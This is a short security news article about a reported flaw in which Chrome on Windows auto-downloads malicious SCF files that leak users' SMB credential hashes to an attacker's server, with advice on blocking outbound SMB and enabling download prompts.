A researcher, Bosko Stankovic of DefenseCode, found worrying vulnerabilities in the default configuration of the latest Chrome browser version downloaded on any Windows operating system, including Windows 10. This flaw allows hackers to steal the remote user’s login credentials. According to the researcher, the user has to visit a website containing a malicious SCF file and his PC starts sharing login credentials with hackers through Chrome and SMB protocol.
All this without the user being aware of it. That is certainly not a new technique: it has already been used by Stuxnet malware, a potent threat created to destabilize the Iranian nuclear program. The new attack differs from the past because, for the first time, it exploits Chrome to hit.
As he explained in a blog post:
Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse victim’s authentication credentials.
The SCF files on malicious sites are automatically downloaded to the user’s PC without their being asked to confirm. As soon as you open the folder where the file is located, the latter will start automatically without having to click on it. Inside this file we find the location of a remote SMB server controlled by the hacker who manages to simulate automatic authentication, obtaining the username and the hashed password. The latter can be “brutal-forced” to get it in plain text.
Decrypt it is not always necessary: many Microsoft services like OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and the like also accept the hashed version password. This type of vulnerability is a real threat to large companies, as well as for the average user because it makes it easy to take control of IT resources. Google is working on a patch.
How to prevent such SMB attacks
To guard against such dangers, you can block outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN via firewall. More simply, you can prevent Chrome’s automatic downloads by going to Chrome > Settings > Show advanced settings > check the Ask where to save each file before downloading option. By doing so you will have to approve each download, avoiding the SCF files that can infect you.